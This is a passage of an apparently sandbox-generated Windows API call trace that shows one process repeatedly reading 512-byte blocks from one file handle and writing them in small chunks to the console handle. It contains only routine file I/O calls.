[0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] GetFileType (hFile=0x50) returned 0x1 [0218.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.174] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.174] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0218.174] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.175] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.175] GetFileType (hFile=0x50) returned 0x1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.176] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.176] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.176] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.176] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] GetFileType (hFile=0x50) returned 0x1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] GetFileType 
(hFile=0x50) returned 0x1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] GetFileType (hFile=0x50) returned 0x1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] GetFileType (hFile=0x50) returned 0x1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] GetFileType (hFile=0x50) returned 0x1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] GetFileType (hFile=0x50) returned 0x1 [0218.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.176] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] GetFileType (hFile=0x50) returned 0x1 [0218.177] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] GetFileType (hFile=0x50) returned 0x1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.177] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.177] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] GetFileType (hFile=0x50) returned 0x1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] GetFileType (hFile=0x50) returned 0x1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] GetFileType (hFile=0x50) returned 0x1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, 
lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] GetFileType (hFile=0x50) returned 0x1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] GetFileType (hFile=0x50) returned 0x1 [0218.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.177] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, 
lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.178] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.178] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.178] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] WriteFile (in: hFile=0x50, 
lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.179] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.179] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0218.179] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.179] GetFileType (hFile=0x50) returned 0x1 [0218.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] GetFileType (hFile=0x50) returned 0x1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] GetFileType (hFile=0x50) returned 0x1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 
[0218.180] GetFileType (hFile=0x50) returned 0x1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] GetFileType (hFile=0x50) returned 0x1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.180] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.180] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.180] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.180] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] GetFileType (hFile=0x50) returned 0x1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] GetFileType (hFile=0x50) returned 0x1 [0218.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.180] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType (hFile=0x50) returned 0x1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, 
lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType (hFile=0x50) returned 0x1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType (hFile=0x50) returned 0x1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType (hFile=0x50) returned 0x1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType (hFile=0x50) returned 0x1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType (hFile=0x50) returned 0x1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: 
lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.181] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.181] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType (hFile=0x50) returned 0x1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType (hFile=0x50) returned 0x1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] GetFileType (hFile=0x50) returned 0x1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] GetFileType (hFile=0x50) returned 0x1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] GetFileType (hFile=0x50) returned 0x1 [0218.182] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0218.182] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] GetFileType (hFile=0x50) returned 0x1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] GetFileType (hFile=0x50) returned 0x1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, 